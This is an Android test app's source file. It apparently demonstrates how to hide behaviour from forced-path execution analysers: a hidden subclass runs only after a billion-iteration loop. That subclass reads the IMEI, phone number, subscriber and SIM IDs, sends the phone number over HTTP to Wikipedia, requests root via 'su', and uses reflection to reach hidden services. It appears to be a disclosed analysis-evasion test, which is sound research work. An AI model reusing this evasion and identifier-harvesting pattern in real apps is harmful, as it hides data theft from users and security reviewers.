package com.ais.forcedpathtest;

import android.content.Context;
import android.os.StrictMode;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.telephony.TelephonyManager;
import android.text.method.ScrollingMovementMethod;
import android.view.View;
import android.widget.Button;
import android.widget.EditText;
import android.widget.TextView;

import java.io.IOException;
import java.lang.reflect.Method;
import java.net.HttpURLConnection;

import java.net.URL;


public class MainActivity extends AppCompatActivity {

    public TextView mTextView;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        mTextView = (TextView) findViewById(R.id.textview);
        mTextView.setMovementMethod(new ScrollingMovementMethod());

        Button button = (Button) findViewById(R.id.button);
        final EditText textbox = (EditText) findViewById(R.id.textbox);

        button.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View view) {
                textbox.setError(null);
                if (textbox.getText().toString().equalsIgnoreCase("yes")){
                    bypassForcedPathExecution();
                }else{
                    textbox.setError("Please enter 'Yes' ");
                    textbox.requestFocus();
                }

            }

        });

    }

    public void bypassForcedPathExecution(){

        visibleClass[] a = new visibleClass[2];
        a[0] = new visibleClass();
        a[1] = new hiddenClass();

        final long iterations = 1000000000;

        for (long i = 1; i <= iterations; i++){
            if(i == iterations)
                a[(int)(i/iterations)].main(i);
        }
    }


    public class visibleClass {
        public long main(long in) {
            return in;
        }
    }

    public class hiddenClass extends visibleClass {
        public long main(long in) {
            System.out.println("hiddenClass, itter: " + in);

            TelephonyManager tele = (TelephonyManager) getSystemService(Context.TELEPHONY_SERVICE);

            mTextView.append("\nIMEI/MEID: " + tele.getDeviceId());
            mTextView.append("\nPhone number: " + tele.getLine1Number());
            mTextView.append("\nSubscriber ID: " + tele.getSubscriberId());
            mTextView.append("\nSim Serial: " + tele.getSimSerialNumber());

            mTextView.append("\nNetwork: " + tele.getNetworkOperatorName());
            mTextView.append("\nNetwork Country: " + tele.getNetworkCountryIso());



            mTextView.append("\n\nConnecting to bbc.co.uk, to show connection to a foreign website.\n");

            StrictMode.ThreadPolicy policy = new StrictMode.ThreadPolicy.Builder().permitAll().build();
            StrictMode.setThreadPolicy(policy);

            try {
                HttpURLConnection con = (HttpURLConnection) new URL("http://www.bbc.co.uk").openConnection();
                con.connect();
                mTextView.append("Http response: " + con.getResponseMessage() + "\n");
            } catch (Exception e) {
                e.printStackTrace();
                mTextView.append("Error Connecting to bbc.co.uk\n");
            }


            mTextView.append("\nConnecting to wikipedia, to show exposing of personal info over http.\n");

            try {
                HttpURLConnection con = (HttpURLConnection) new URL("https://en.wikipedia.org/w/index.php?search=" + tele.getLine1Number()).openConnection();
                con.connect();
                mTextView.append("Http response: " + con.getResponseMessage() + "\n");
            } catch (Exception e) {
                e.printStackTrace();
                mTextView.append("Error Connecting to wikipedia\n");
            }


            mTextView.append("\nRequesting root permission, feel free to deny it\n");
            try {
                Process p = Runtime.getRuntime().exec("su");
            } catch (IOException e) {
                e.printStackTrace();
                mTextView.append("Couldn't run su.\n");
            }


            try {
                Method method = Class.forName("android.os.ServiceManager").getDeclaredMethod("getService", String.class);
                method.invoke(null, "iphonesubinfo");
                mTextView.append("\nCalled function via reflection.\n");
            } catch (Exception e) {
                e.printStackTrace();
            }

            return in;
        }
    }
}
